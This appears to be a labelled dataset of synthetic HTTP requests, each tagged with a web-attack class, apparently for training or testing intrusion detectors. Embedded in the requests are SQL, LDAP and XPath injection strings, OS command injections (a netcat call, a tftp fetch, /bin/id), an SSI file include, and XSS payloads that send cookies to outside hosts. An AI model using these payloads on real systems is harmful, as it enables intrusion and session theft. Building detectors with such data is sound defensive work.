Cookie: nWI=uI2m;i6smelePnaBs0e=autoexecnbfde5iT7 q;orzpmtij1s=47739561;en7i=edeieelocationote(jo;o4=Ynbetweeng
Cookie2: $Version="480"
Date: Sat, 19 Jul 08 02:07:29 UTC
ETag: W/"ngzqPUm_y8rOkRm"
Expect: 100-continue
From: iewh@iaeEupId.net
If-Modified-Since: Wed, 27 Aug 08 19:55:31 GMT
If-Unmodified-Since: Sat, 21 Feb 04 06:33:42 GMT
If-Match: *
If-None-Match: "MhMW9yZqmYbYFs9"
If-Range: "@-h9Wu@nbEzc-oR"
Max-Forwards: 556
MIME-Version: 6.3
Pragma: huT='9'
Proxy-Authorization: NTLM RmE3Nm9vdGNCZ3BlaXk4ZHJ3aHNiRWVueWRucWVuZ20=
Authorization: ltecs izzi=e1tnnski
Range: 23-,057-,45-
Referer: /rCssari/pazPciib/g8tah/afndre.jsp
TE: chunked;q=0.2,deflate;q=0.5,deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: Mozilla/9.7 (compatible; Konqueror/8.1; Linux i586; sIi2a; anrSet)
UA-CPU: 68000
UA-Disp: 757,752,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 395x881
Via: glhd7/1.4 www.REHk.gif
Transfer-Encoding: deflate
Upgrade: ridti/5.6, m2mn/9.7, 5cse/3.2, eaEos/5.1
Warning: 248 www.elmeri.shtml "SdvreCihiq" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48979
Start - Id: 41153
class: SqlInjection
GET /o2rcptaA.aFh410U/esaonOnve/2wVPIR/twbVSW6kunc5cVtQ.exe?STsjaeenHtape=group+bytE&ritd=3php%2FNmxljumooo&cdaegtYemoaOnVr=rn9hrc%5Dth&if=%27%3B+++++EXEC+++master.dbo.sp_makewebtask++++%27c%3A%5Cinetpub%5Cwwwroot%5Ctuhne.html%27%2C++%27SELECT++ilAtne++FROM+++++ntouk+++WHERE++xtype%3D%27%27U%27%27%27&tlnIectiN1=191&or=nne%3AhccsztrlO&prdpn=7596 HTTP/1.1
Host: 174.196.61.60:80
Connection: close
Accept: application/*, application/*;q=0.3, video/*;q=0.3
Accept-Charset: x-mac-roman
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Cookie: ieghswrp=mLD8;nbTwotss=qlo3mantoNpt;o3rsPugntevog=010
Cookie2: $Version="310"
Date: Tue, 08 May 07 23:37:30 UTC
ETag: "kySf-tR9OR..Mwo"
Expect: jnem
From: etcosIO@avtere.net
If-Modified-Since: Thu, 25 Sep 08 08:47:08 CET
If-Unmodified-Since: Wed, 12 Nov 08 01:59:45 GMT
If-Match: "x3QJjPFzWPMPqM6"
If-None-Match: *
If-Range: "JNk7LRhRVFw-x1Xg89xU"
Max-Forwards: 1034
Pragma: no-cache
Proxy-Authorization: 0uodl1 2odeShn4=r2hpv
Authorization: NTLM NnRzaWlpYWtiaGVhcUhlb2xveXBvaUg2ZXRlNGlsVHNldG9UbGJ4cm1z
Range: -024
Referer: /eowpotsh/lnOyimu/j4GSentd/sp4tEs/stuo.pl
TE: deflate,deflate,trailers
User-Agent: ihrtoipld/0.5.6.2.2
UA-CPU: 68000
UA-OS: Windows 98
Via: alu/3.6 www.a2oeesn.tiff, 6.1 www.etiIt.jpg, 8.6 56.53.254.221
Transfer-Encoding: compress
Warning: 317 5.218.126.84:2 "bdhuhPeStawrDs" 
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41153
Start - Id: 42938
class: OsCommanding
GET /sesc422egeoetlt/lYTfe3OHV/Slfooowot/s8zwtpr6h/yw_rq0mrgXS/dJ-ea7/fk.cgi?ne=d3u&M0aV@kJjI=dhinGw&minsbvfarobz=413070&lRaQXH=55&hnN0iohrorcrtat=alCcsshex5hew&toiso=oSN8hkzFXn-&oatnoNtshhardad=72868 HTTP/1.1
Host: 178.29.220.250
Connection: mcsrsni
Accept: video/*, application/zip
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: %0a    nc     www.islaineronol.com     80    ;
Cache-Control: max-age=6774
Client-ip: 226.241.221.163
Cookie: 2w07=5940;nSnhl=fHGuvr
Cookie2: $Version="866"
Date: Sat, 30 Sep 06 11:36:26 GMT
ETag: W/"TPazJN9VkdLe-HTD6v"
Expect: 100-continue
If-Modified-Since: Tue, 21 Sep 04 08:49:49 GMT
If-Unmodified-Since: Thu, 02 Sep 04 14:05:15 GMT
If-Match: *
If-Range: Wed, 21 Apr 04 18:05:10 CET
Max-Forwards: 6
MIME-Version: 6.5
Pragma: no-cache
Authorization: Digest algorithm=3cAedpl
Range: 01418-88080,370072-
Referer: /diob5b/uDgs/ttvtmtzf.gz
TE: deflate
Trailer: Referer
User-Agent: ;%20/bin/id%3b
UA-CPU: PowerPC
UA-Disp: 810,554,16
UA-Color: color32
UA-Pixels: 512x475
Via: 5.0 55.98.52.230, taob/3.4 www.o0o4e.js, 3.0 www.i1bmt.tiff
Transfer-Encoding: compress
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42938
Start - Id: 48356
class: XPathInjection
GET /aftonlkveTc5r7lr6lj/nxeXHMM_uDW73YmQ/cWH/edsiscs/x1qfserviceswhere@vu3y/danxbltstu/tfhe7ielhd/irlRxnE5yRW/ubsiBt0LKljEYD3Kh2v/tfn7j1hqyh7ekaem.msf?osoarnssiec=152858&tewttct2d=la+%7E&hasetit=2rnjaelminsrr HTTP/1.1
Host: www.ohwi.it
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: (i    <  count(itwyF/child::text())   and  j <  count(itvik/child::comment())   and   k   <   count(d0ndm/child::*)   )
Cache-Control: no-store
Client-ip: 107.146.131.163
Cookie: ameUzdw=4858391;ohnovh1lii=a5JSrr2bsai;lacsvnats9a6=50332;-dLZIimgJErL=haa;lh=854625035
Cookie2: $Version="0"
Date: Tue, 02 Sep 08 18:37:39 UTC
ETag: W/"DiaYz0AA1cS12qGseo"
Expect: 100-continue
From: aloit2ef@imcvhU.st
If-Modified-Since: Sun, 13 Jul 08 16:35:03 CET
If-Unmodified-Since: Mon, 18 Jul 05 02:31:43 CET
If-Match: "2MDIVp-vpmp3HPHnyD.p"
If-None-Match: "VeLF0z@j3li3H3diVAy"
If-Range: *
Max-Forwards: 01
MIME-Version: 4.9
Pragma: 2sq='mnpo'
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: idn2 t3g6oh4=t46e
Range: -579124,02412-
Referer: /azeNp8.swf
TE: gzip;q=0.5,gzip;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/2.8 (Windows; U; Win 9x 6.8; oi-te; rv:8.9.8) Gecko/43417801
UA-Color: color32
UA-Pixels: 784x5970
Via: HTTP/9.6 www.bpfa.gif, 0.2 www.5irec.jpg, 9.1 www.NpeEl.html
Transfer-Encoding: identity
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 17597605220
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48356
Start - Id: 38791
class: LdapInjection
GET /tahttlniefa/IHAvVftpJlbPY/hfv/seeth3/85h8cweM3vorw6F2qvyN/lmefnstRatj3/mtMaoEC/dS9yt7r3otonnh7dotr.aspx?0%uhnxg_68=e+stryiano&rnrqtntos8rdt=fa&roldqme7hp=jieiiOfJcapie&7rsofadmwP=txtr&5wxyauesrenf=dERIsDUiyfmz&ilg5eracatffsrf=0mtoen&biimjt9p=%29++++%28++++%7C++++%28displayName%3Dhad*%29+%28name++%3D+had*++%29%28mail%3Dhad*++%29&r0jieoutsteoo=oHL92m&ierafsdey=A6include&NcsyiNhpp=2&cnnamReaaw=92174&Nto=eume&OsuEew=pbg9&uotqAVCTsBaccess_log=+nielrie%5Bsns HTTP/1.0
Host: www.p9rhH.fr
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, euc-kr;q=0.0, utf-7;q=0.1, iso-2022-jp, x-mac-icelandic
Accept-Encoding: identity;q=0.3, gzip;q=0.8, compress
Accept-Language: *
Cache-Control: max-stale
Client-ip: 239.52.8.232
Cookie: Hedtekvlpogv=18;itatrrnhmtip=lbl;TlCRbgsound= 5 sh[]oeabeg~;execZftpWLP='t0rcptsmn
Cookie2: $Version="919"
Date: Tue, 10 Oct 06 07:19:28 GMT
ETag: "IBtj26H_ux12tRgi"
Expect: 100-continue
From: ia8hCn@scttdt.org
If-Modified-Since: Tue, 24 Aug 04 14:49:25 UTC
If-Unmodified-Since: Thu, 05 Nov 09 10:57:26 CET
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: *
If-Range: Mon, 19 Sep 05 20:18:53 UTC
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic eTR0b2k6b2dyZQ==
Range: 777808-9828,-9730,-076
Referer: http://www.alScctke.net/titEiaao/foAuli.pl
TE: deflate;q=0.5,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.6 (compatible; MSIE 9.6; Open BSD i386; ret8)
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 601x604
Via: 7.3 3.128.75.251
Transfer-Encoding: identity
Upgrade: liolTj/2.0, duhrti/7.2, cci/9.1, eaeYog/1.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38791
Start - Id: 41660
class: SqlInjection
GET /ifvvRAcDvjzl1ru/eony7/@nUF_kY5anda5s/o2zkeFcsxhaIeeprSav.gif?nh8nt=chairs%27++++UNION++SELECT+n++++FROM+++dba_users++++WHERE++name+++like++%27%2525&eeOu=+&adtlmiwdekaibis=nTv0oeJ&stsjnaib4t=yiu%3BwgautoexecWenvl3Ea&eood=mo HTTP/1.1
Host: 237.93.69.213:99
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: hz-gb-2312;q=0.8
Accept-Encoding: *;q=0.7
Accept-Language: tltna-slHe, 8kws6NJr-pd
Cache-Control: no-cache
Client-ip: 239.57.78.114
Cookie: z_36E4Q=irl~oeiu0o]htfxr phpp;tp=8027
Cookie2: $Version="6"
Date: Mon, 27 Aug 07 10:48:36 GMT
ETag: "L82TrxVO5n5XlbEpUI"
Expect: tdqm
From: oseas@soacs.biz
If-Modified-Since: Fri, 13 May 05 09:37:10 GMT
If-Unmodified-Since: Thu, 21 Apr 05 04:40:33 CET
If-Match: "hquv3Vog_ZWaetd"
If-None-Match: "ZrEIaWe6QQnjlnf6iTt"
If-Range: *
Max-Forwards: 6348
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ewnBd ycpeari1=oiYepi
Authorization: ebDoe1 e2o6goee=Atbb0aec
Range: 0-,-4,4860-288700
Referer: /pdkhafrb/rahmg.txt
TE: deflate,gzip;q=0.4,chunked
Trailer: If-Range
User-Agent: Mozilla/0.4 (Machintosh; U; Mac OS X 9.9; da-uE; rv:9.8.0) Gecko/49249012
UA-CPU: MIPS
UA-Disp: 627,8726,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/0.4 www.stgRwi5.png:3938, FTP/8.8 218.220.4.225:8135, FTP/0.0 183.219.30.169
Transfer-Encoding: compress
Upgrade: eelO/2.0, utnt/9.3, aSn/6.5
Warning: 553 www.mekn.jpg "dieiIfit2dki8e" 
X-Forwarded-For: 236.249.18.77
X-Serial-Number: 611965021882313
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 41660
Start - Id: 48227
class: XSS
PUT /mB/aLgeeNCZUlJlXBGCkpf/oSbF9jL-9Rf/yt_7lhXXUcS-KL/ir--/dA5JLje3ozs8Le-pka.msf? HTTP/1.1
Content-Length: 157
Content-Language: lah8Wel,n
Content-Encoding: deflate
Content-Location: http://www.xRnypnex.be/ophn/0eI6tNps/hocinf/teedsh/r3ydar.avi
Content-MD5: aWV0YWtsNG5jcGVhaDhBbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Nov 04 12:33:51 UTC
Last-Modified: Sat, 26 Feb 05 18:32:03 UTC
Host: 133.1.95.253:80
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: euc-tw;q=0.3, windows-1252;q=0.3, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: airfy5-gizuc, e7rKesm-o;q=0.0
Cache-Control: max-age=5101
Client-ip: 242.73.87.196
Cookie: _5h5=<img     src = "     javascript: [document.location.replace ('http://www.lenage.com/cgi-bin/etmeleet.cgi'+document.cookie);]"  >;PallKGbjB=iw;sxercdblaect5i=nvwc hs%r9l;onl=aehdn;wiZeerab=mnswrtir@o
Cookie2: $Version="830"
Date: Wed, 12 Aug 09 11:36:53 UTC
ETag: W/"cpFzrcC@6hyaKzz"
Expect: koeea
If-Modified-Since: Mon, 02 Oct 06 08:25:18 GMT
If-Unmodified-Since: Sun, 05 Nov 06 19:50:51 CET
If-Match: "8-uS.kMnWS5I5d@p"
If-Range: *
Max-Forwards: 5197
Pragma: eaa2='sresoeno'
Proxy-Authorization: NTLM a29uYXJ6amV5cGtyYnNzZW5lc2hvbmVhRTV0bEh0Ym9ldWV3OA==
Authorization: Basic ejM0dHc6ZXJ5MGFl
Referer: /reTY/aceq.shtml
TE: deflate;q=0.0,trailers,trailers
Trailer: From
User-Agent: Re1rOdmudadtexH8jOe
UA-Color: color32
UA-Pixels: 1593x216
Via: 6.5 www.ieJTam7.html, 8.5 194.164.223.157, FTP/2.5 www.w6Ic.jpeg
Transfer-Encoding: identity
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_nDcWFj=rlenjvl81eeeh&a0ayvv2replacef-=tseh4c5s iaccept7e&ntytsebjseherw=570&ng=dRiRnGr&nx=pQd5-2YE&ohaxntnenqpc=iuxml8dbodykuFO&t7OR4=mDntvAF&c3zfaasld=9707

End - Id: 48227
Start - Id: 46921
class: XSS
PUT /7DsOzTTIDxq4E4mvB7fP/qt_dgjVRJlxBkeeBJ0Ta/iktdgibwiiaemcE8pe/DgautoexechSy/dW@3UffR/afcaaQ7@FLIqCsB./h4mlo5nhetx5oDoicceu/lKr%u/yxLiMJ@ZrJOq8Qt/JorDEpasswdN3/no0Ahride.gif? HTTP/1.0
Content-Length: 208
Content-Language: daanhfo,onoe0
Content-Encoding: gzip
Content-Location: http://www.kvhdEois.ch/Dten/ehrf/9nd7r.nsf
Content-MD5: dGhJZXN0dGRpZ3dtdE5ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Apr 08 20:20:19 UTC
Last-Modified: Sat, 12 Mar 05 22:20:01 GMT
Host: 222.30.162.13:03365
Connection: close
Accept: video/quicktime;q=0.8, text/*
Accept-Charset: utf-7;q=0.2, gb2312;q=0.0, euc-tw;q=0.4, x-mac-turkish
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=941
Client-ip: 182.145.1.138
Cookie: sicTsl=075054;ao1rsooion=tdoa>;.BDB0_echo=ewn6ntxpzoqda;eo5fs3t=80296852;iAonnn=rDjkRB;hpaktwnItna=e1C5m62lIPJe
Cookie2: $Version="1"
Date: Sun, 02 Mar 08 18:06:33 CET
ETag: W/"8gCraCWHramfcOb-S0.p"
Expect: 100-continue
From: HsznrM@xmaxp.fr
If-Modified-Since: Mon, 14 Nov 05 07:22:42 GMT
If-Unmodified-Since: Fri, 08 Oct 04 09:04:22 UTC
If-Match: "ifgnEX6zRgo.d-5uoS"
If-None-Match: *
If-Range: Sat, 16 Jan 10 13:23:59 CET
Max-Forwards: 782
MIME-Version: 9.1
Pragma: oaci=stenrra3
Proxy-Authorization: NTLM Y2NlbUFhZmIzc3JobmUwMm14bGVyZWlpbWk4eGVUZzJocmVodGluRWl4aXRuaVo=
Authorization: NTLM aWxWNWxhd2h0b3VpYXRhamVldHRzZGFjYWV0aG5zaHFlaG1venFkaW03bg==
Range: -790
Referer: http://www.rel4.it/enklms/Otewt.jsp
TE: chunked;q=0.1
Trailer: Accept-Encoding
User-Agent: eKmv6u1FH http://www.amthnasn.be
UA-CPU: MIPS
UA-Disp: 2330,130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 5.6 30.229.92.116:976, uhptG/9.5 245.142.8.51, awe3e/8.4 49.110.174.190:5745
Transfer-Encoding: tkr6ic; asyxqwye=ooat
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

G_F_G0=<iframe  src  =   " vbscript:[window.open('http://101.2.16.109/arsi.bin'+document.cookie);]    " >&YQMwheretv=eacn0eeme3&d24slr947iar=rekiyin:en iiys<h&idtuuru=3

End - Id: 46921
Start - Id: 42199
class: SqlInjection
GET /penYc_f/hRMDz/adevea3nc/el9oa/mzolm5o/sZJZzE_oF_/Kk/zoNnPX/tnegkaexes5eegbrv5dm/b9ukhtr7sdsEyufl/c1sdckDoc75/sxIRu.php4?Vu959whereinsertN7=ti%40&aieose=q+t6o+Iph&axf8srt=p&me=4450326&Irli1Yj=98440&l1earoo1=chairs%27++UN%2F**%2FION++SEL%2F**%2FECT+++9uxfosii+++++FROM+dba_users++WHERE+oa1Nb++like++%27%2525&nxrwyn=882&rgsw=0or&nwere5m4=e2oJtTKnR&qete7csa=e068-BgUK%40&shutdowncwm=328658638&detl6x1smnI=40004457&NMxeBNktPH1m=a%25rrcwlldgnph-&NtitzytltqgLodo=8325694&TpsXdivB=N HTTP/1.0
Host: 45.119.235.142
Connection: yi28uitj
Accept: video/*, audio/basic;q=0.4, image/*
Accept-Charset: cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 139.139.72.242
Cookie: otc5gsller5hrin=eK_S02bUB_M;tln=hal7ytNIdtlEh;outrelz=aoatraowrdocumentn;8oirtAelegi=Ec""ilEdjdEd;nph-Fd@xwgroup by=i@l.3Rk
Cookie2: $Version="304"
Date: Fri, 30 Jul 04 06:28:19 CET
ETag: W/"dHYBM.QKDh@vxmx"
Expect: r1lpdtu
From: g0Ln@OyJoc.biz
If-Modified-Since: Thu, 25 Mar 10 05:07:50 CET
If-Unmodified-Since: Sat, 07 Feb 09 24:31:16 GMT
If-Match: *
If-None-Match: "I-3qwsvbAZO.WMY6"
If-Range: *
Max-Forwards: 474
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM aWdxbGhoMGpsb3R5dHRkMWV0Ym5haXRhckFPbGlidmVuczZhdW9iWTdsbnRp
Range: 8473-303,-227666,770360-
Referer: /neoarP/oe6sucet/ohugt8om/e8oSbt.php4
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: If-Modified-Since
User-Agent: 1qB-DcTvS7 http://www.nyfwyoir.com
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: HTTP/7.9 125.161.41.166:90020, 9.2 218.78.222.68, 9.5 www.oiicee.png:69
Transfer-Encoding: ryr87; al2it=arTleer
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 52.218.75.150
X-Serial-Number: 145107
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42199
Start - Id: 44557
class: OsCommanding
GET /aeoeuotmorduq/oun9fg62/a9xwVyeUm6X_.v/v2u1/nmBadRw197xgCD9WBr/yy8sasYtaunxaiurnno/d1IcqX/oth/1o5rooueIgtrregb.shtml?gt=20&eek=132765&ta=dh%2B&haghbiiptier=5&ht=9window.open0opena+na4&tr7ieayfphaA=7279497937&5Qnf@tHy=382268950&oMOsmnjxom=exTS&eeiia1ezinlg=d8O.NlBy%40Dwh&s6ma=06162478&hlo=18011872 HTTP/1.0
Host: www.toln.ch:14
Connection: tonn
Accept-Charset: windows-1250;q=0.5, koi8;q=0.2, iso-8859-7, iso-8859-7
Accept-Encoding: 
Accept-Language: 98.165.127.36   | tftp 192.168.10.33 evil.txt
Cache-Control: no-cache
Client-ip: 114.130.40.240
Date: Sat, 13 Mar 04 07:48:21 GMT
If-Match: "Uc8AsqjcT4pASWHm"
Referer: http://x6oVtrrr.st/yobh/rhctng/nsSo.nsf
TE: chunked,gzip,trailers
User-Agent: rerytAveisertesxh4e5

null

End - Id: 44557
Start - Id: 47914
class: XSS
GET /lGIg6UH-wAS8WRXcuEw/elW6D-IObwCy8eNmcbz/SyEf/mcs/rceasheht/hI1passwdQ8zq6UkFn1.css?gs=vh&N5wdLinputleg4=%3Cstyle+++type++%3D+%22++text%2Fjavascript+++++%22+++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.metichil.com%2Fcgi-bin%2Fro.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle++%3E&o4issreHibi9hek=tfyIa&ioeoo=2577&sgNisne2eoi=84&b7CVop5%uy=s%2FlibTc&pcieoaoin7sO=4&eslxT1s=d1bit%3EaeLeot&htdeor=mks&srdipewt=646274510&QhJ5_e.=eE%406p1nca HTTP/1.1
Host: 106.180.7.52
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.0, identity
Accept-Language: p-te
Cache-Control: max-stale
Client-ip: 93.12.193.202
Cookie: 7FUacceptxQwWmzo=wd6f25Ij0p;i5wemclsid1aosI=<aeaapshttpaeyIwnthe;7Y46wZk=i0n
Cookie2: $Version="6"
Date: Tue, 20 Jan 09 18:16:29 GMT
ETag: W/"cJc-HCc20ZvA@@p"
Expect: IEds=yM0cnd;onix
From: 4ebutle@EleUossins.org
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Fri, 17 Jul 09 04:45:45 UTC
If-Match: "G8@J4gzT6_jbAXe4ANwj"
If-None-Match: "kF-F9w5nbD2A0l1"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic emllZWVlOnpnYWU=
Authorization: Digest realm
Range: -419,3-
Referer: /dai0lnrr/rhImaaon/5rdATbay.aspx
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.1 (Machintosh; U; Mac OS X 4.1; zc-9b; rv:5.4.9) Gecko/53593356
UA-CPU: Sparc
UA-Disp: 188,935,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.8 www.lsffikew.jpeg, 1eefe/4.1 www.A89m.gif, HTTP/9.0 217.16.173.81
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47914
Start - Id: 38215
class: LdapInjection
GET /oY1Pipr/oisRytbonnFka/ndt/aUUCsXTM/mgrryAisens0en/eYP9.mspx?ta=+&5engeidIsox3n=375322&dt=%29+++%28+++%7C++%28displayName%3Dhad*%29%28name++%3D++had*%29%28+++mail%3Dhad*++%29 HTTP/1.0
Host: www.ecrpd2g.de
Connection: nca83
Accept: */*
Accept-Charset: isiri-3342
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="20"
Date: Tue, 10 May 05 24:11:28 GMT
ETag: W/"UStOSs522pUjsYdXz8Jw"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 03 Nov 09 16:46:02 UTC
If-Unmodified-Since: Wed, 15 Jul 09 21:22:00 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 28 Feb 05 23:10:28 CET
Max-Forwards: 18
MIME-Version: 3.2
Pragma: b2aobsar='in1a2'
Proxy-Authorization: 5eRiuu etshnsqi=eO4i
Authorization: NTLM ZWN5dHdvRGVyZ3djM3NvdGxpaW95aXNzZXJ0bmFvSGR5c21lZWNpZnNyZG9uZm5h
Range: 6990-,287-21192,-12716
Referer: http://www.frdt.it/wLmanC.dll
TE: trailers,trailers
Trailer: Warning
User-Agent: dojcxdsn (bga2J_okJq; ihLkewN; eRVEoj; s_EeqwdZ; uprEKaZqO)
UA-CPU: 68000
UA-Disp: 912,7281,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 321x2267
Via: fxhc/4.2 235.190.142.45, etosgv/0.4 www.jen4hru.css, 5.1 www.oueR.css
Transfer-Encoding: identity
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38215
Start - Id: 48132
class: XSS
GET /ewknijqa2ejctss6v/cBoO/otbghjgh/iHOTWReu.asmx?evalbdocumentXgb=re%3Ae%28elsusrnph-+lb&ut=60864&hra=%26%7B%5Balert+++%28%27aevuE5toza%27%29%3B%5D%7D%3B&ro7i0edeDu=772119363&leSYgonasofmen=processing-instructionatnm2plike%3Ccegitea%3Foed&erNhfl=r&Umtqe6ai30esst=di01tli&ael=47&ago=cbsWraioNesduq HTTP/1.1
Host: www.nrrh4.de
Connection: gasey
Accept: */*
Accept-Charset: koi8, iso-8859-7;q=0.2, iso-8859-4;q=0.3, cp-936, iso-8859-3;q=0.7
Accept-Encoding: compress;q=0.0, gzip, identity
Accept-Language: *;q=0.7
Cache-Control: min-fresh=38
Client-ip: 94.244.224.171
Cookie: phmeshbesrgaa=0awde/;eep=dtadbe5vel;atesd=ct
Cookie2: $Version="2"
Date: Tue, 06 Apr 10 03:52:27 UTC
ETag: W/"RdKDdWmzVeSfgJG3"
Expect: hdZrwa
From: terhoe3@ygfzae.st
If-Modified-Since: Sun, 08 Aug 04 07:26:33 UTC
If-Unmodified-Since: Sat, 18 Jun 05 16:40:40 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Dec 07 20:32:24 UTC
Max-Forwards: 804
MIME-Version: 8.0
Pragma: ew=CstO
Proxy-Authorization: Digest realm
Authorization: fNss o6se=C22aan
Range: 839-854295,-2024
Referer: http://sagii2it.uk/iey09se/mvrkaa2/eoerd/jja2b/aaeAl.mdb
TE: deflate,gzip,trailers
Trailer: Accept
User-Agent: Mozilla/5.0 (compatible; MSIE 2.5; SunOS sun4u; najnxrl; elodd)
UA-CPU: Sparc
UA-Disp: 121,8495,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8071x836
Via: FTP/8.7 www.5ueaa.jpeg, HTTP/4.5 227.81.84.77
Transfer-Encoding: y0sEs
Upgrade: ahrnb/9.3, dedEnm/2.8, Knaee1/4.9, betzh/8.1, EaMe1a/1.8
Warning: 994 www.tlp8eHc.js "tnRTM0oe" "Fri, 07 Sep 07 09:29:11 CET"
X-Forwarded-For: 72.155.7.72
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48132
Start - Id: 40390
class: SSI
GET /7LRyRs2/tfeegr3ntaoipoho/oLK5JPEMJC0WZkSdYbsq/d6@Wms3WY4eK1d-dBVQt/11stdin.NRFrNEd/147gvZW6ezUmRuKryC8.cgi?eob1it4reEa=3469272560&re=7&ehs4ntv=te&ciedAdo=ftarHe0axfsUwxcFf&z9zif=wb7aitnq&rt=90412741&narua=iSJinxmsnreamtiau&jKdsfe=pnjc+noht3s&aretNka3=ueif%28&PZS_mZszt=replacee6e&rus=096774 HTTP/1.1
Host: www.aesrrrtrsd.biz:80
Connection: close
Accept: image/png, audio/*;q=0.6
Accept-Encoding: 
Accept-Language: nrDt-p;q=0.9, yEoo-R6sag;q=0.4, nay-hi;q=0.0
Cookie: idesiwal=execVimg3h-iqyq;eetn=m6kT@0;aOisaLyavwsm=pHlihavingtkc]?as8rnchildy;ote=75235;enrrlosediskoss=<!-- #include    virtual="d:\windows\autoexec.bat"  -->;Isb3veoroeztwn=81308275
Date: Thu, 11 Sep 08 06:03:04 UTC
If-Match: *
If-None-Match: "g5-FY6ho8js7KT7.GkS"
Max-Forwards: 235
Referer: /ras7idlt/ldt1x/btsi.doc
User-Agent: Mozilla/9.2 (X11; U; Unix 6.3; im-wh; rv:6.6.0) Gecko/47942241

null

End - Id: 40390
Start - Id: 40510
class: SSI
